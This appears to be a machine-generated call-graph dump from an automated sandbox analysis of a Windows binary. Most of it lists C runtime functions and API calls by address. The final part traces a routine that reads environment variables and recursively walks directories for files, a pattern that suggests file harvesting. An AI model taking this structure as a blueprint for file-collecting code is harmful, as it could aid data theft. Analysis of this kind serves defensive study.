7499->7495 7499->7497 7500->7495 7502 228e6355 __dosmaperr 20 API calls 7501->7502 7503 228e633d _free 7502->7503 7504 228e6368 _free 20 API calls 7503->7504 7505 228e6350 7504->7505 7505->7438 7515 228e8d52 7506->7515 7508 228e9f9f 7509 228e9fb8 SetFilePointerEx 7508->7509 7510 228e9fa7 7508->7510 7511 228e9fd0 GetLastError 7509->7511 7514 228e9fac 7509->7514 7512 228e6368 _free 20 API calls 7510->7512 7513 228e6332 __dosmaperr 20 API calls 7511->7513 7512->7514 7513->7514 7514->7410 7516 228e8d5f 7515->7516 7517 228e8d74 7515->7517 7518 228e6355 __dosmaperr 20 API calls 7516->7518 7519 228e6355 __dosmaperr 20 API calls 7517->7519 7521 228e8d99 7517->7521 7520 228e8d64 7518->7520 7522 228e8da4 7519->7522 7523 228e6368 _free 20 API calls 7520->7523 7521->7508 7524 228e6368 _free 20 API calls 7522->7524 7525 228e8d6c 7523->7525 7526 228e8dac 7524->7526 7525->7508 7527 228e62ac _abort 26 API calls 7526->7527 7527->7525 7529 228e8dc9 7528->7529 7530 228e8dd6 7528->7530 7531 228e6368 _free 20 API calls 7529->7531 7533 228e8de2 7530->7533 7534 228e6368 _free 20 API calls 7530->7534 7532 228e8dce 7531->7532 7532->7458 7533->7458 7535 228e8e03 7534->7535 7536 228e62ac _abort 26 API calls 7535->7536 7536->7532 7538 228e5af6 _abort 38 API calls 7537->7538 7539 228e7c24 7538->7539 7540 228e7a00 __fassign 38 API calls 7539->7540 7541 228e7c34 7540->7541 7541->7473 7542->7452 7546 228ead24 7543->7546 7545 228eadca 7545->7368 7547 228ead30 ___DestructExceptionObject 7546->7547 7557 228e8c7b RtlEnterCriticalSection 7547->7557 7549 228ead3e 7550 228ead65 7549->7550 7551 228ead70 7549->7551 7558 228eae4d 7550->7558 7553 228e6368 _free 20 API calls 7551->7553 7554 228ead6b 7553->7554 7573 228ead9a 7554->7573 7556 228ead8d _abort 7556->7545 7557->7549 7559 228e8d52 26 API calls 7558->7559 7562 228eae5d 7559->7562 7560 228eae63 7576 228e8cc1 7560->7576 7562->7560 7563 228eae95 7562->7563 7565 228e8d52 26 API calls 7562->7565 7563->7560 7566 228e8d52 26 API calls 7563->7566 7568 228eae8c 7565->7568 7569 228eaea1 CloseHandle 7566->7569 7567 228eaedd 7567->7554 7572 228e8d52 26 API calls 7568->7572 7569->7560 7570 228eaead GetLastError 7569->7570 7570->7560 7571 228e6332 __dosmaperr 20 API calls 7571->7567 7572->7563 7585 228e8c9e RtlLeaveCriticalSection 7573->7585 7575 228eada4 7575->7556 7577 228e8d37 7576->7577 7578 228e8cd0 7576->7578 7579 228e6368 _free 20 API calls 7577->7579 7578->7577 7583 228e8cfa 7578->7583 7580 228e8d3c 7579->7580 7581 228e6355 __dosmaperr 20 API calls 7580->7581 7582 228e8d27 7581->7582 7582->7567 7582->7571 7583->7582 7584 228e8d21 SetStdHandle 7583->7584 7584->7582 7585->7575 7586->7341 7587->7321 5999 228e8a89 6002 228e6d60 5999->6002 6003 228e6d72 6002->6003 6004 228e6d69 6002->6004 6006 228e6c5f 6004->6006 6026 228e5af6 GetLastError 6006->6026 6008 228e6c6c 6046 228e6d7e 6008->6046 6010 228e6c74 6055 228e69f3 6010->6055 6013 228e6c8b 6013->6003 6016 228e6cce 6018 228e571e _free 20 API calls 6016->6018 6018->6013 6020 228e6cc9 6021 228e6368 _free 20 API calls 6020->6021 6021->6016 6022 228e6d12 6022->6016 6079 228e68c9 6022->6079 6023 228e6ce6 6023->6022 6024 228e571e _free 20 API calls 6023->6024 6024->6022 6027 228e5b0c 6026->6027 6028 228e5b12 6026->6028 6029 228e5e08 _abort 11 API calls 6027->6029 6030 228e637b _abort 20 API calls 6028->6030 6032 228e5b61 SetLastError 6028->6032 6029->6028 6031 228e5b24 6030->6031 6033 228e5b2c 6031->6033 6034 228e5e5e _abort 11 API calls 6031->6034 6032->6008 6035 228e571e _free 20 API calls 6033->6035 6036 228e5b41 6034->6036 6037 228e5b32 6035->6037 6036->6033 6038 228e5b48 6036->6038 6039 228e5b6d SetLastError 6037->6039 6040 228e593c _abort 20 API calls 6038->6040 6082 228e55a8 6039->6082 6042 228e5b53 6040->6042 6043 228e571e _free 20 API calls 6042->6043 6045 228e5b5a 6043->6045 6045->6032 6045->6039 6047 228e6d8a ___DestructExceptionObject 6046->6047 6048 228e5af6 _abort 38 API calls 6047->6048 6052 228e6d94 6048->6052 6050 228e6e18 _abort 6050->6010 6051 228e55a8 _abort 38 API calls 6051->6052 6052->6050 6052->6051 6054 228e571e _free 20 API calls 6052->6054 6255 228e5671 RtlEnterCriticalSection 6052->6255 6256 228e6e0f 6052->6256 6054->6052 6260 228e54a7 6055->6260 6058 228e6a26 6060 228e6a3d 6058->6060 6061 228e6a2b GetACP 6058->6061 6059 228e6a14 GetOEMCP 6059->6060 6060->6013 6062 228e56d0 6060->6062 6061->6060 6063 228e570e 6062->6063 6064 228e56de _abort 6062->6064 6066 228e6368 _free 20 API calls 6063->6066 6064->6063 6065 228e56f9 RtlAllocateHeap 6064->6065 6068 228e474f _abort 7 API calls 6064->6068 6065->6064 6067 228e570c 6065->6067 6066->6067 6067->6016 6069 228e6e20 6067->6069 6068->6064 6070 228e69f3 40 API calls 6069->6070 6071 228e6e3f 6070->6071 6074 228e6e90 IsValidCodePage 6071->6074 6076 228e6e46 6071->6076 6077 228e6eb5 ___scrt_fastfail 6071->6077 6072 228e2ada _ValidateLocalCookies 5 API calls 6073 228e6cc1 6072->6073 6073->6020 6073->6023 6075 228e6ea2 GetCPInfo 6074->6075 6074->6076 6075->6076 6075->6077 6076->6072 6407 228e6acb GetCPInfo 6077->6407 6480 228e6886 6079->6480 6081 228e68ed 6081->6016 6093 228e7613 6082->6093 6085 228e55b8 6087 228e55c2 IsProcessorFeaturePresent 6085->6087 6092 228e55e0 6085->6092 6088 228e55cd 6087->6088 6123 228e60e2 6088->6123 6129 228e4bc1 6092->6129 6132 228e7581 6093->6132 6096 228e766e 6097 228e767a _abort 6096->6097 6098 228e5b7a __dosmaperr 20 API calls 6097->6098 6099 228e76a1 _abort 6097->6099 6103 228e76a7 _abort 6097->6103 6098->6099 6100 228e76f3 6099->6100 6099->6103 6122 228e76d6 6099->6122 6101 228e6368 _free 20 API calls 6100->6101 6102 228e76f8 6101->6102 6146 228e62ac 6102->6146 6108 228e771f 6103->6108 6149 228e5671 RtlEnterCriticalSection 6103->6149 6110 228e777e 6108->6110 6111 228e7776 6108->6111 6119 228e77a9 6108->6119 6150 228e56b9 RtlLeaveCriticalSection 6108->6150 6110->6119 6151 228e7665 6110->6151 6114 228e4bc1 _abort 28 API calls 6111->6114 6114->6110 6116 228e5af6 _abort 38 API calls 6120 228e780c 6116->6120 6118 228e7665 _abort 38 API calls 6118->6119 6154 228e782e 6119->6154 6121 228e5af6 _abort 38 API calls 6120->6121 6120->6122 6121->6122 6158 228ebdc9 6122->6158 6124 228e60fe ___scrt_fastfail 6123->6124 6125 228e612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6124->6125 6126 228e61fb ___scrt_fastfail 6125->6126 6127 228e2ada _ValidateLocalCookies 5 API calls 6126->6127 6128 228e6219 6127->6128 6128->6092 6177 228e499b 6129->6177 6135 228e7527 6132->6135 6134 228e55ad 6134->6085 6134->6096 6136 228e7533 ___DestructExceptionObject 6135->6136 6141 228e5671 RtlEnterCriticalSection 6136->6141 6138 228e7541 6142 228e7575 6138->6142 6140 228e7568 _abort 6140->6134 6141->6138 6145 228e56b9 RtlLeaveCriticalSection 6142->6145 6144 228e757f 6144->6140 6145->6144 6161 228e6231 6146->6161 6148 228e62b8 6148->6122 6149->6108 6150->6111 6152 228e5af6 _abort 38 API calls 6151->6152 6153 228e766a 6152->6153 6153->6118 6155 228e77fd 6154->6155 6156 228e7834 6154->6156 6155->6116 6155->6120 6155->6122 6176 228e56b9 RtlLeaveCriticalSection 6156->6176 6159 228e2ada _ValidateLocalCookies 5 API calls 6158->6159 6160 228ebdd4 6159->6160 6160->6160 6162 228e5b7a __dosmaperr 20 API calls 6161->6162 6163 228e6247 6162->6163 6164 228e62a6 6163->6164 6167 228e6255 6163->6167 6172 228e62bc IsProcessorFeaturePresent 6164->6172 6166 228e62ab 6168 228e6231 _abort 26 API calls 6166->6168 6169 228e2ada _ValidateLocalCookies 5 API calls 6167->6169 6170 228e62b8 6168->6170 6171 228e627c 6169->6171 6170->6148 6171->6148 6173 228e62c7 6172->6173 6174 228e60e2 _abort 8 API calls 6173->6174 6175 228e62dc GetCurrentProcess TerminateProcess 6174->6175 6175->6166 6176->6155 6178 228e49a7 _abort 6177->6178 6179 228e49bf 6178->6179 6199 228e4af5 GetModuleHandleW 6178->6199 6208 228e5671 RtlEnterCriticalSection 6179->6208 6183 228e4a65 6216 228e4aa5 6183->6216 6186 228e49c7 6186->6183 6188 228e4a3c 6186->6188 6209 228e527a 6186->6209 6191 228e4a54 6188->6191 6212 228e4669 6188->6212 6189 228e4aae 6195 228ebdc9 _abort 5 API calls 6189->6195 6190 228e4a82 6219 228e4ab4 6190->6219 6192 228e4669 _abort 5 API calls 6191->6192 6192->6183 6198 228e4ab3 6195->6198 6200 228e49b3 6199->6200 6200->6179 6201 228e4b39 GetModuleHandleExW 6200->6201 6202 228e4b63 GetProcAddress 6201->6202 6205 228e4b78 6201->6205 6202->6205 6203 228e4b8c FreeLibrary 6204 228e4b95 6203->6204 6206 228e2ada _ValidateLocalCookies 5 API calls 6204->6206 6205->6203 6205->6204 6207 228e4b9f 6206->6207 6207->6179 6208->6186 6227 228e5132 6209->6227 6213 228e4698 6212->6213 6214 228e2ada _ValidateLocalCookies 5 API calls 6213->6214 6215 228e46c1 6214->6215 6215->6191 6248 228e56b9 RtlLeaveCriticalSection 6216->6248 6218 228e4a7e 6218->6189 6218->6190 6249 228e6025 6219->6249 6222 228e4ae2 6225 228e4b39 _abort 8 API calls 6222->6225 6223 228e4ac2 GetPEB 6223->6222 6224 228e4ad2 GetCurrentProcess TerminateProcess 6223->6224 6224->6222 6226 228e4aea ExitProcess 6225->6226 6230 228e50e1 6227->6230 6229 228e5156 6229->6188 6231 228e50ed ___DestructExceptionObject 6230->6231 6238 228e5671 RtlEnterCriticalSection 6231->6238 6233 228e50fb 6239 228e515a 6233->6239 6237 228e5119 _abort 6237->6229 6238->6233 6242 228e5182 6239->6242 6243 228e517a 6239->6243 6240 228e2ada _ValidateLocalCookies 5 API calls 6241 228e5108 6240->6241 6245 228e5126 6241->6245 6242->6243 6244 228e571e _free 20 API calls 6242->6244 6243->6240 6244->6243 6246 228e56b9 _abort RtlLeaveCriticalSection 6245->6246 6247 228e5130 6246->6247 6247->6237 6248->6218 6250 228e604a 6249->6250 6254 228e6040 6249->6254 6251 228e5c45 _abort 5 API calls 6250->6251 6251->6254 6252 228e2ada _ValidateLocalCookies 5 API calls 6253 228e4abe 6252->6253 6253->6222 6253->6223 6254->6252 6255->6052 6259 228e56b9 RtlLeaveCriticalSection 6256->6259 6258 228e6e16 6258->6052 6259->6258 6261 228e54c4 6260->6261 6267 228e54ba 6260->6267 6262 228e5af6 _abort 38 API calls 6261->6262 6261->6267 6263 228e54e5 6262->6263 6268 228e7a00 6263->6268 6267->6058 6267->6059 6269 228e7a13 6268->6269 6271 228e54fe 6268->6271 6269->6271 6276 228e7f0f 6269->6276 6272 228e7a2d 6271->6272 6273 228e7a55 6272->6273 6274 228e7a40 6272->6274 6273->6267 6274->6273 6275 228e6d7e __fassign 38 API calls 6274->6275 6275->6273 6277 228e7f1b ___DestructExceptionObject 6276->6277 6278 228e5af6 _abort 38 API calls 6277->6278 6279 228e7f24 6278->6279 6280 228e7f72 _abort 6279->6280 6288 228e5671 RtlEnterCriticalSection 6279->6288 6280->6271 6282 228e7f42 6289 228e7f86 6282->6289 6287 228e55a8 _abort 38 API calls 6287->6280 6288->6282 6290 228e7f56 6289->6290 6291 228e7f94 __fassign 6289->6291 6293 228e7f75 6290->6293 6291->6290 6296 228e7cc2 6291->6296 6406 228e56b9 RtlLeaveCriticalSection 6293->6406 6295 228e7f69 6295->6280 6295->6287 6297 228e7d42 6296->6297 6300 228e7cd8 6296->6300 6298 228e7d90 6297->6298 6301 228e571e _free 20 API calls 6297->6301 6364 228e7e35 6298->6364 6300->6297 6303 228e7d0b 6300->6303 6308 228e571e _free 20 API calls 6300->6308 6302 228e7d64 6301->6302 6304 228e571e _free 20 API calls 6302->6304 6305 228e7d2d 6303->6305 6310 228e571e _free 20 API calls 6303->6310 6306 228e7d77 6304->6306 6307 228e571e _free 20 API calls 6305->6307 6309 228e571e _free 20 API calls 6306->6309 6311 228e7d37 6307->6311 6313 228e7d00 6308->6313 6315 228e7d85 6309->6315 6316 228e7d22 6310->6316 6317 228e571e _free 20 API calls 6311->6317 6312 228e7dfe 6318 228e571e _free 20 API calls 6312->6318 6324 228e90ba 6313->6324 6314 228e7d9e 6314->6312 6322 228e571e 20 API calls _free 6314->6322 6320 228e571e _free 20 API calls 6315->6320 6352 228e91b8 6316->6352 6317->6297 6323 228e7e04 6318->6323 6320->6298 6322->6314 6323->6290 6325 228e91b4 6324->6325 6327 228e90cb 6324->6327 6325->6303 6326 228e90dc 6329 228e90ee 6326->6329 6330 228e571e _free 20 API calls 6326->6330 6327->6326 6328 228e571e _free 20 API calls 6327->6328 6328->6326 6331 228e9100 6329->6331 6332 228e571e _free 20 API calls 6329->6332 6330->6329 6333 228e9112 6331->6333 6334 228e571e _free 20 API calls 6331->6334 6332->6331 6335 228e9124 6333->6335 6336 228e571e _free 20 API calls 6333->6336 6334->6333 6337 228e9136 6335->6337 6338 228e571e _free 20 API calls 6335->6338 6336->6335 6339 228e9148 6337->6339 6340 228e571e _free 20 API calls 6337->6340 6338->6337 6341 228e915a 6339->6341 6342 228e571e _free 20 API calls 6339->6342 6340->6339 6343 228e916c 6341->6343 6344 228e571e _free 20 API calls 6341->6344 6342->6341 6345 228e917e 6343->6345 6346 228e571e _free 20 API calls 6343->6346 6344->6343 6347 228e9190 6345->6347 6348 228e571e _free 20 API calls 6345->6348 6346->6345 6349 228e91a2 6347->6349 6350 228e571e _free 20 API calls 6347->6350 6348->6347 6349->6325 6351 228e571e _free 20 API calls 6349->6351 6350->6349 6351->6325 6353 228e91c5 6352->6353 6363 228e921d 6352->6363 6354 228e91d5 6353->6354 6356 228e571e _free 20 API calls 6353->6356 6355 228e91e7 6354->6355 6357 228e571e _free 20 API calls 6354->6357 6358 228e571e _free 20 API calls 6355->6358 6360 228e91f9 6355->6360 6356->6354 6357->6355 6358->6360 6359 228e920b 6362 228e571e _free 20 API calls 6359->6362 6359->6363 6360->6359 6361 228e571e _free 20 API calls 6360->6361 6361->6359 6362->6363 6363->6305 6365 228e7e60 6364->6365 6366 228e7e42 6364->6366 6365->6314 6366->6365 6370 228e925d 6366->6370 6369 228e571e _free 20 API calls 6369->6365 6371 228e926e 6370->6371 6405 228e7e5a 6370->6405 6372 228e9221 __fassign 20 API calls 6371->6372 6373 228e9276 6372->6373 6374 228e9221 __fassign 20 API calls 6373->6374 6375 228e9281 6374->6375 6376 228e9221 __fassign 20 API calls 6375->6376 6377 228e928c 6376->6377 6378 228e9221 __fassign 20 API calls 6377->6378 6379 228e9297 6378->6379 6380 228e9221 __fassign 20 API calls 6379->6380 6381 228e92a5 6380->6381 6382 228e571e _free 20 API calls 6381->6382 6383 228e92b0 6382->6383 6384 228e571e _free 20 API calls 6383->6384 6385 228e92bb 6384->6385 6386 228e571e _free 20 API calls 6385->6386 6387 228e92c6 6386->6387 6388 228e9221 __fassign 20 API calls 6387->6388 6389 228e92d4 6388->6389 6390 228e9221 __fassign 20 API calls 6389->6390 6391 228e92e2 6390->6391 6392 228e9221 __fassign 20 API calls 6391->6392 6393 228e92f3 6392->6393 6394 228e9221 __fassign 20 API calls 6393->6394 6395 228e9301 6394->6395 6396 228e9221 __fassign 20 API calls 6395->6396 6397 228e930f 6396->6397 6398 228e571e _free 20 API calls 6397->6398 6399 228e931a 6398->6399 6400 228e571e _free 20 API calls 6399->6400 6401 228e9325 6400->6401 6402 228e571e _free 20 API calls 6401->6402 6403 228e9330 6402->6403 6404 228e571e _free 20 API calls 6403->6404 6404->6405 6405->6369 6406->6295 6408 228e6baf 6407->6408 6414 228e6b05 6407->6414 6411 228e2ada _ValidateLocalCookies 5 API calls 6408->6411 6413 228e6c5b 6411->6413 6413->6076 6417 228e86e4 6414->6417 6416 228e8a3e 43 API calls 6416->6408 6418 228e54a7 __fassign 38 API calls 6417->6418 6419 228e8704 MultiByteToWideChar 6418->6419 6421 228e8742 6419->6421 6429 228e87da 6419->6429 6423 228e56d0 21 API calls 6421->6423 6426 228e8763 ___scrt_fastfail 6421->6426 6422 228e2ada _ValidateLocalCookies 5 API calls 6424 228e6b66 6422->6424 6423->6426 6431 228e8a3e 6424->6431 6425 228e87d4 6436 228e8801 6425->6436 6426->6425 6428 228e87a8 MultiByteToWideChar 6426->6428 6428->6425 6430 228e87c4 GetStringTypeW 6428->6430 6429->6422 6430->6425 6432 228e54a7 __fassign 38 API calls 6431->6432 6433 228e8a51 6432->6433 6440 228e8821 6433->6440 6437 228e881e 6436->6437 6438 228e880d 6436->6438 6437->6429 6438->6437 6439 228e571e _free 20 API calls 6438->6439 6439->6437 6441 228e883c 6440->6441 6442 228e8862 MultiByteToWideChar 6441->6442 6443 228e888c 6442->6443 6444 228e8a16 6442->6444 6447 228e56d0 21 API calls 6443->6447 6450 228e88ad 6443->6450 6445 228e2ada _ValidateLocalCookies 5 API calls 6444->6445 6446 228e6b87 6445->6446 6446->6416 6447->6450 6448 228e8962 6453 228e8801 __freea 20 API calls 6448->6453 6449 228e88f6 MultiByteToWideChar 6449->6448 6451 228e890f 6449->6451 6450->6448 6450->6449 6467 228e5f19 6451->6467 6453->6444 6455 228e8939 6455->6448 6457 228e5f19 11 API calls 6455->6457 6456 228e8971 6459 228e56d0 21 API calls 6456->6459 6462 228e8992 6456->6462 6457->6448 6458 228e8a07 6461 228e8801 __freea 20 API calls 6458->6461 6459->6462 6460 228e5f19 11 API calls 6463 228e89e6 6460->6463 6461->6448 6462->6458 6462->6460 6463->6458 6464 228e89f5 WideCharToMultiByte 6463->6464 6464->6458 6465 228e8a35 6464->6465 6466 228e8801 __freea 20 API calls 6465->6466 6466->6448 6468 228e5c45 _abort 5 API calls 6467->6468 6469 228e5f40 6468->6469 6472 228e5f49 6469->6472 6475 228e5fa1 6469->6475 6473 228e2ada _ValidateLocalCookies 5 API calls 6472->6473 6474 228e5f9b 6473->6474 6474->6448 6474->6455 6474->6456 6476 228e5c45 _abort 5 API calls 6475->6476 6477 228e5fc8 6476->6477 6478 228e2ada _ValidateLocalCookies 5 API calls 6477->6478 6479 228e5f89 LCMapStringW 6478->6479 6479->6472 6481 228e6892 ___DestructExceptionObject 6480->6481 6488 228e5671 RtlEnterCriticalSection 6481->6488 6483 228e689c 6489 228e68f1 6483->6489 6487 228e68b5 _abort 6487->6081 6488->6483 6501 228e7011 6489->6501 6491 228e693f 6492 228e7011 26 API calls 6491->6492 6493 228e695b 6492->6493 6494 228e7011 26 API calls 6493->6494 6495 228e6979 6494->6495 6496 228e68a9 6495->6496 6497 228e571e _free 20 API calls 6495->6497 6498 228e68bd 6496->6498 6497->6496 6515 228e56b9 RtlLeaveCriticalSection 6498->6515 6500 228e68c7 6500->6487 6502 228e7022 6501->6502 6511 228e701e 6501->6511 6503 228e7029 6502->6503 6505 228e703c ___scrt_fastfail 6502->6505 6504 228e6368 _free 20 API calls 6503->6504 6506 228e702e 6504->6506 6508 228e706a 6505->6508 6509 228e7073 6505->6509 6505->6511 6507 228e62ac _abort 26 API calls 6506->6507 6507->6511 6510 228e6368 _free 20 API calls 6508->6510 6509->6511 6513 228e6368 _free 20 API calls 6509->6513 6512 228e706f 6510->6512 6511->6491 6514 228e62ac _abort 26 API calls 6512->6514 6513->6512 6514->6511 6515->6500 7588 228e2049 7590 228e2055 ___DestructExceptionObject 7588->7590 7589 228e205e 7590->7589 7591 228e207d 7590->7591 7592 228e20d3 7590->7592 7602 228e244c 7591->7602 7593 228e2639 ___scrt_fastfail 4 API calls 7592->7593 7595 228e20da 7593->7595 7596 228e2082 7611 228e2308 7596->7611 7598 228e2087 __RTC_Initialize 7614 228e20c4 7598->7614 7600 228e209f 7617 228e260b 7600->7617 7603 228e2451 ___scrt_release_startup_lock 7602->7603 7604 228e2455 7603->7604 7607 228e2461 7603->7607 7605 228e527a _abort 20 API calls 7604->7605 7606 228e245f 7605->7606 7606->7596 7608 228e246e 7607->7608 7609 228e499b _abort 28 API calls 7607->7609 7608->7596 7610 228e4bbd 7609->7610 7610->7596 7623 228e34c7 RtlInterlockedFlushSList 7611->7623 7613 228e2312 7613->7598 7625 228e246f 7614->7625 7616 228e20c9 ___scrt_release_startup_lock 7616->7600 7618 228e2617 7617->7618 7622 228e262d 7618->7622 7633 228e53ed 7618->7633 7621 228e3529 ___vcrt_uninitialize 8 API calls 7621->7622 7622->7589 7624 228e34d7 7623->7624 7624->7613 7630 228e53ff 7625->7630 7628 228e391b ___vcrt_uninitialize_ptd 6 API calls 7629 228e354d 7628->7629 7629->7616 7631 228e5c2b 11 API calls 7630->7631 7632 228e2476 7631->7632 7632->7628 7636 228e74da 7633->7636 7638 228e74f3 7636->7638 7637 228e2ada _ValidateLocalCookies 5 API calls 7639 228e2625 7637->7639 7638->7637 7639->7621 6642 228ea1c6 IsProcessorFeaturePresent 6643 228e7bc7 6644 228e7bd3 ___DestructExceptionObject 6643->6644 6647 228e7c0a _abort 6644->6647 6651 228e5671 RtlEnterCriticalSection 6644->6651 6646 228e7be7 6648 228e7f86 __fassign 20 API calls 6646->6648 6649 228e7bf7 6648->6649 6652 228e7c10 6649->6652 6651->6646 6655 228e56b9 RtlLeaveCriticalSection 6652->6655 6654 228e7c17 6654->6647 6655->6654 7640 228ea945 7642 228ea96d 7640->7642 7641 228ea9a5 7642->7641 7643 228ea99e 7642->7643 7644 228ea997 7642->7644 7653 228eaa00 7643->7653 7649 228eaa17 7644->7649 7650 228eaa20 7649->7650 7657 228eb19b 7650->7657 7654 228eaa20 7653->7654 7655 228eb19b __startOneArgErrorHandling 21 API calls 7654->7655 7656 228ea9a3 7655->7656 7658 228eb1da __startOneArgErrorHandling 7657->7658 7663 228eb25c __startOneArgErrorHandling 7658->7663 7667 228eb59e 7658->7667 7660 228eb286 7662 228eb292 7660->7662 7674 228eb8b2 7660->7674 7664 228e2ada _ValidateLocalCookies 5 API calls 7662->7664 7663->7660 7670 228e78a3 7663->7670 7666 228ea99c 7664->7666 7681 228eb5c1 7667->7681 7671 228e78cb 7670->7671 7672 228e2ada _ValidateLocalCookies 5 API calls 7671->7672 7673 228e78e8 7672->7673 7673->7660 7675 228eb8bf 7674->7675 7676 228eb8d4 7674->7676 7678 228eb8d9 7675->7678 7679 228e6368 _free 20 API calls 7675->7679 7677 228e6368 _free 20 API calls 7676->7677 7677->7678 7678->7662 7680 228eb8cc 7679->7680 7680->7662 7682 228eb5ec __raise_exc 7681->7682 7683 228eb7e5 RaiseException 7682->7683 7684 228eb5bc 7683->7684 7684->7663 7066 228e5303 7069 228e50a5 7066->7069 7078 228e502f 7069->7078 7072 228e502f 5 API calls 7073 228e50c3 7072->7073 7074 228e5000 20 API calls 7073->7074 7075 228e50ce 7074->7075 7076 228e5000 20 API calls 7075->7076 7077 228e50d9 7076->7077 7079 228e5048 7078->7079 7080 228e2ada _ValidateLocalCookies 5 API calls 7079->7080 7081 228e5069 7080->7081 7081->7072 7082 228e7103 GetCommandLineA GetCommandLineW 7685 228eaf43 7686 228eaf4d 7685->7686 7687 228eaf59 7685->7687 7686->7687 7688 228eaf52 CloseHandle 7686->7688 7688->7687 6516 228e7a80 6517 228e7a8d 6516->6517 6518 228e637b _abort 20 API calls 6517->6518 6519 228e7aa7 6518->6519 6520 228e571e _free 20 API calls 6519->6520 6521 228e7ab3 6520->6521 6522 228e637b _abort 20 API calls 6521->6522 6526 228e7ad9 6521->6526 6524 228e7acd 6522->6524 6525 228e571e _free 20 API calls 6524->6525 6525->6526 6527 228e7ae5 6526->6527 6528 228e5eb7 6526->6528 6529 228e5c45 _abort 5 API calls 6528->6529 6530 228e5ede 6529->6530 6531 228e5efc InitializeCriticalSectionAndSpinCount 6530->6531 6532 228e5ee7 6530->6532 6531->6532 6533 228e2ada _ValidateLocalCookies 5 API calls 6532->6533 6534 228e5f13 6533->6534 6534->6526 7689 228e8640 7692 228e8657 7689->7692 7693 228e8679 7692->7693 7694 228e8665 7692->7694 7695 228e8693 7693->7695 7696 228e8681 7693->7696 7697 228e6368 _free 20 API calls 7694->7697 7702 228e54a7 __fassign 38 API calls 7695->7702 7703 228e8652 7695->7703 7699 228e6368 _free 20 API calls 7696->7699 7698 228e866a 7697->7698 7700 228e62ac _abort 26 API calls 7698->7700 7701 228e8686 7699->7701 7700->7703 7704 228e62ac _abort 26 API calls 7701->7704 7702->7703 7704->7703 7083 228e281c 7086 228e2882 7083->7086 7089 228e3550 7086->7089 7088 228e282a 7090 228e358a 7089->7090 7091 228e355d 7089->7091 7090->7088 7091->7090 7092 228e47e5 ___std_exception_copy 21 API calls 7091->7092 7093 228e357a 7092->7093 7093->7090 7094 228e544d ___std_exception_copy 26 API calls 7093->7094 7094->7090 6656 228e4bdd 6657 228e4bec 6656->6657 6658 228e4c08 6656->6658 6657->6658 6659 228e4bf2 6657->6659 6660 228e6d60 51 API calls 6658->6660 6661 228e6368 _free 20 API calls 6659->6661 6662 228e4c0f GetModuleFileNameA 6660->6662 6663 228e4bf7 6661->6663 6664 228e4c33 6662->6664 6665 228e62ac _abort 26 API calls 6663->6665 6679 228e4d01 6664->6679 6666 228e4c01 6665->6666 6671 228e4c66 6673 228e6368 _free 20 API calls 6671->6673 6672 228e4c72 6674 228e4d01 38 API calls 6672->6674 6678 228e4c6b 6673->6678 6676 228e4c88 6674->6676 6675 228e571e _free 20 API calls 6675->6666 6677 228e571e _free 20 API calls 6676->6677 6676->6678 6677->6678 6678->6675 6681 228e4d26 6679->6681 6683 228e4d86 6681->6683 6691 228e70eb 6681->6691 6682 228e4c50 6685 228e4e76 6682->6685 6683->6682 6684 228e70eb 38 API calls 6683->6684 6684->6683 6686 228e4c5d 6685->6686 6687 228e4e8b 6685->6687 6686->6671 6686->6672 6687->6686 6688 228e637b _abort 20 API calls 6687->6688 6689 228e4eb9 6688->6689 6690 228e571e _free 20 API calls 6689->6690 6690->6686 6694 228e7092 6691->6694 6695 228e54a7 __fassign 38 API calls 6694->6695 6696 228e70a6 6695->6696 6696->6681 6535 228e4a9a 6538 228e5411 6535->6538 6539 228e541d _abort 6538->6539 6540 228e5af6 _abort 38 API calls 6539->6540 6543 228e5422 6540->6543 6541 228e55a8 _abort 38 API calls 6542 228e544c 6541->6542 6543->6541 5763 228e1c5b 5764 228e1c6b ___scrt_fastfail 5763->5764 5767 228e12ee 5764->5767 5766 228e1c87 5768 228e1324 ___scrt_fastfail 5767->5768 5769 228e13b7 GetEnvironmentVariableW 5768->5769 5793 228e10f1 5769->5793 5772 228e10f1 57 API calls 5773 228e1465 5772->5773 5774 228e10f1 57 API calls 5773->5774 5775 228e1479 5774->5775 5776 228e10f1 57 API calls 5775->5776 5777 228e148d 5776->5777 5778 228e10f1 57 API calls 5777->5778 5779 228e14a1 5778->5779 5780 228e10f1 57 API calls 5779->5780 5781 228e14b5 lstrlenW 5780->5781 5782 228e14d9 lstrlenW 5781->5782 5792 228e14d2 5781->5792 5783 228e10f1 57 API calls 5782->5783 5784 228e1501 lstrlenW lstrcatW 5783->5784 5785 228e10f1 57 API calls 5784->5785 5786 228e1539 lstrlenW lstrcatW 5785->5786 5787 228e10f1 57 API calls 5786->5787 5788 228e156b lstrlenW lstrcatW 5787->5788 5789 228e10f1 57 API calls 5788->5789 5790 228e159d lstrlenW lstrcatW 5789->5790 5791 228e10f1 57 API calls 5790->5791 5791->5792 5792->5766 5794 228e1118 ___scrt_fastfail 5793->5794 5795 228e1129 lstrlenW 5794->5795 5806 228e2c40 5795->5806 5798 228e1168 lstrlenW 5799 228e1177 lstrlenW FindFirstFileW 5798->5799 5800 228e11a0 5799->5800 5801 228e11e1 5799->5801 5802 228e11aa 5800->5802 5803 228e11c7 FindNextFileW 5800->5803 5801->5772 5802->5803 5808 228e1000 5802->5808 5803->5800 5805 228e11da FindClose 5803->5805 5805->5801 5807 228e1148 lstrcatW lstrlenW 5806->5807 5807->5798 5807->5799 5809 228e1022 ___scrt_fastfail 5808->5809 5810 228e10af 5809->5810 5811 228e102f lstrcatW lstrlenW 5809->5811 5812 228e10b5 lstrlenW 5810->5812 5823 228e10ad 5810->5823 5813 228e105a lstrlenW 5811->5813 5814 228e106b lstrlenW 5811->5814 5839 228e1e16 5812->5839 5813->5814 5825 228e1e89 lstrlenW 5814->5825 5817 228e1088 GetFileAttributesW 5819 228e109c 5817->5819 5817->5823 5818 228e10ca 5820 228e1e89 5 API calls 5818->5820 5818->5823 5819->5823 5831 228e173a 5819->5831 5822 228e10df 5820->5822 5844 228e11ea 5822->5844 5823->5802 5826 228e2c40 ___scrt_fastfail 5825->5826 5827 228e1ea7 lstrcatW lstrlenW 5826->5827 5828 228e1ec2 5827->5828 5829 228e1ed1 lstrcatW 5827->5829 5828->5829 5830 228e1ec7 lstrlenW 5828->5830 5829->5817 5830->5829 5832 228e1747 ___scrt_fastfail 5831->5832 5859 228e1cca 5832->5859 5835 228e199f 5835->5823 5837 228e1824 ___scrt_fastfail _strlen 5837->5835 5879 228e15da 5837->5879 5840 228e1e29 5839->5840 5843 228e1e4c 5839->5843 5841 228e1e2d lstrlenW 